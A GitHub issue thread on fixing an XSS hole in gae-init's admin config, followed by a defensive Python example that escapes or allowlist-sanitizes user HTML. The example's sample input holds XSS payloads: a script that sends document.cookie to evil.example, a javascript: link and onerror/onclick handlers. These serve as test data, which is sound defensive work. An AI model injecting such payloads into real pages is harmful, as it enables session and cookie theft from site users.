Comments (6)
Yes, I'm aware of that, and the reason I didn't want to escape or treat it with care is that sometimes you want to add links, make something strong or have a header... and, as you mentioned, from the admin console you can do a lot of bad things, so you'd better be careful who is admin and who is not :)
from gae-init.
Understood, and no problem there. However, I want to use HTML input elsewhere too, and there I will need to sanitize the user input; I'm thinking of adding Bleach (possibly in combination with either CKEditor or TinyMCE).
Unless you tell me that we already have some "cleaner" built into gae-init?
from gae-init.
Well, by default Jinja2 escapes the variables, and unless you're explicitly saying that it's safe (at your own risk) it won't escape them..
Just remove the | safe filter there and you'll see...
https://github.com/gae-init/gae-init/blob/master/main/templates/bit/announcement.html#L4
You can read more about it here: http://jinja.pocoo.org/docs/templates/#html-escaping
from gae-init.
Sure, but I want to render the user-input HTML... thus I need to clean it on input.
BTW: I'm okay with this being "my" problem, in that gae-init will not dictate a particular approach to this issue.
from gae-init.
If you have the user input and it's actually HTML but you still want to be a bit safe, then I guess you'll have to do some research on what exactly suits your needs: whether it's going to be client-side or server-side, whether it's going to clean up some HTML tags or just escape them, etc.
But if you're choosing between CKEditor and TinyMCE, I would suggest you go with CKEditor, because I played with TinyMCE in the past and it's a pain... CK looks more robust, produces friendlier HTML and has cooler features..
from gae-init.
As said in closing #61 "Fixed XSS vulnerability in Admin Config": yes, it is important to avoid/fix XSS vulnerabilities in your final product; the PR #61 hints at one such approach (using https://github.com/jsocol/bleach and https://github.com/html5lib/html5lib-python) and will resolve the issue. However, gae-init does not need to mandate this particular solution.
from gae-init.
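A worked illustration of the two options this thread keeps coming back to, added for this page and not code from gae-init, from Bleach or from any of the commenters: `escape_html` is the escape-everything route (the same idea as Jinja2's autoescaping once the `| safe` filter is gone), and `sanitize_html` is a small server-side allowlist cleaner written with the standard library's `html.parser`, standing in for what Bleach does so that the example runs without extra dependencies. The allowed tag set, the `rel="nofollow noopener"` added to links and the sample input are assumptions chosen for this example; Bleach's own defaults and options differ.

```python
"""Escape-everything versus allowlist sanitizing for user-supplied HTML.

Added illustration for this thread, standard library only.  Not gae-init
code and not Bleach; the allowlist below is an assumption for the example.
"""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allowlist: enough for links, emphasis and headers, nothing else.
ALLOWED_TAGS = {"a", "strong", "em", "p", "br", "h1", "h2", "h3", "ul", "ol", "li"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = {"http", "https", "mailto"}


def escape_html(text):
    """Autoescape route: < > & and quotes become entities, no markup survives.
    Same idea as Jinja2 autoescaping (Jinja2 spells the quote entities differently)."""
    return html.escape(text, quote=True)


def safe_url(url):
    """Allow relative URLs and http(s)/mailto; reject javascript:, data:, etc.
    Whitespace is removed first because browsers ignore it inside a scheme."""
    scheme = urlparse("".join(url.split())).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class AllowlistSanitizer(HTMLParser):
    """Rebuild a fragment keeping only ALLOWED_TAGS / ALLOWED_ATTRS.

    Unknown tags are dropped but their text is kept; <script>/<style> are
    dropped with their content; text is re-escaped; output stays balanced."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.skip_depth = 0  # >0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skip_depth += 1
            return
        if self.skip_depth or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops onclick=, onerror=, style=, ...
            if name == "href" and not safe_url(value or ""):
                continue  # drops javascript: links but keeps the <a> text
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        if tag == "a":
            kept.append(' rel="nofollow noopener"')  # assumed policy for user links
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skip_depth = max(0, self.skip_depth - 1)
            return
        if self.skip_depth or tag not in self.open_tags:
            return
        while self.open_tags:  # close anything still open inside `tag`
            closed = self.open_tags.pop()
            self.out.append("</%s>" % closed)
            if closed == tag:
                break

    def handle_data(self, data):
        if not self.skip_depth:
            # convert_charrefs decoded entities on the way in; escape on the way out
            self.out.append(html.escape(data, quote=False))

    def result(self):
        while self.open_tags:  # input ended with tags still open
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_html(fragment):
    """Clean on input: store and render the return value, never the raw fragment."""
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return parser.result()


# Constructed sample input for the example, not taken from the issue thread.
USER_INPUT = (
    '<h2>Release notes</h2>'
    '<p>See <a href="https://example.com/x" onclick="steal()">the docs</a>'
    ' and <a href="javascript:alert(1)">this</a>.</p>'
    '<script>location="http://evil.example/?c="+document.cookie</script>'
    '<img src=x onerror=alert(1)>'
    '<strong>bold &amp; 1 &lt; 2'
)

if __name__ == "__main__":
    print(escape_html(USER_INPUT))    # nothing renders as markup
    print(sanitize_html(USER_INPUT))  # header and links kept, script and handlers gone
```

The split the thread describes is visible in the two functions: escaping is what you want whenever the value is not supposed to carry markup (the announcement template once `| safe` is removed), while an allowlist cleaner is what you need when users may legitimately add links, bold text or headers. Run the cleaner on the server at input time and keep the raw submission out of the datastore; a client-side editor such as CKEditor only shapes what cooperative users send, not what an attacker posts directly.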